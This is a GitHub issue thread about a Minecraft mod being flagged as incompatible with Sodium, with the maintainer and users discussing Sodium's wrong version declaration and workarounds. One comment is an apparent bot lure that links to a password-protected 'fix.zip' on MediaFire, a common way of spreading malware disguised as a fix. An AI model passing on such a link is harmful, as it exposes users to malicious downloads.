### ISSUE TITLE
[Bug]: 4.5 is still incompatible with sodium

### ISSUE THREAD

**Issue by VaporeonScripts** [someaddons/betterfpsdistances#53]
### Describe the bug you're experiencing

![image](https://github.com/user-attachments/assets/ca71ff59-480a-4a8a-a1a2-d87f54d177ef)

### Reproducability

put the latest mod with latest sodium version

### Mod up to date

- [X] Before submitting this issue I updated to the newest version and reproduced it

### Minecraft version

1.21.1

### Modloader version

Fabric

### Logs

no logs

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VaporeonScripts** [comment]
bruh fking bots

**Comment by Koekieezz** [comment]
no fix yet?

**Comment by VaporeonScripts** [comment]
Nope ,the developer ain't fixing it🤣

**Comment by tajemniktv** [comment]
Y'all can simply overwrite dependency breaks either in fabric included file, specific for this kind of operations or in sodium json directly.

**Comment by someaddons** [comment]
its sodium breaking it to begin with lol. I did update the compat sodium is just blocking the version number.....

**Comment by VaporeonScripts** [comment]
then change the version name lol

**Comment by SAJewers** [comment]
You accidentally uploaded the fixed version to the FarSight mod page.

**Comment by VaporeonScripts** [comment]
LMFAO, bro must've been drunk fr, cool how curseforge allowed it

**Comment by tajemniktv** [comment]
It... has nothing to do with uploading the wrong versions tho?
It's literally a thing Sodium team should patch on their end, as they are shipping Sodium along with mistakenly written version of this mod apparently. Yall instead of opening two issues for the same thing, should report that to Jellysquid or/and the Caffeine team. Someaddon can and I think should bump the version to 4.6 which won't be screaming for conflicts with Sodium (as the next Sodium release might be either beta 2 or full release [doubt], which I bet won't be happening too soon), but that's still Sodiums team mistake, and developers having to push fake updates, just cuz someone effed up while writing mod versions is not something I would personally like to see

**Comment by tajemniktv** [comment]
For anyone wanting a at home fix, simply edit this file in sodium jar to actually match betterfpsdistant versioning:
![image](https://github.com/user-attachments/assets/8ed8fdf4-aa71-4a43-bea2-5b2400d35373)

**Comment by someaddons** [comment]
> It... has nothing to do with uploading the wrong versions tho? It's literally a thing Sodium team should patch on their end, as they are shipping Sodium along with mistakenly written version of this mod apparently. Yall instead of opening two issues for the same thing, should report that to Jellysquid or/and the Caffeine team. Someaddon can and I think should bump the version to 4.6 which won't be screaming for conflicts with Sodium (as the next Sodium release might be either beta 2 or full release [doubt], which I bet won't be happening too soon), but that's still Sodiums team mistake, and developers having to push fake updates, just cuz someone effed up while writing mod versions is not something I would personally like to see

ye exactly that, had to push another update with an arbitrarily increased version, since sodium put the wrong version into their incompat declaration
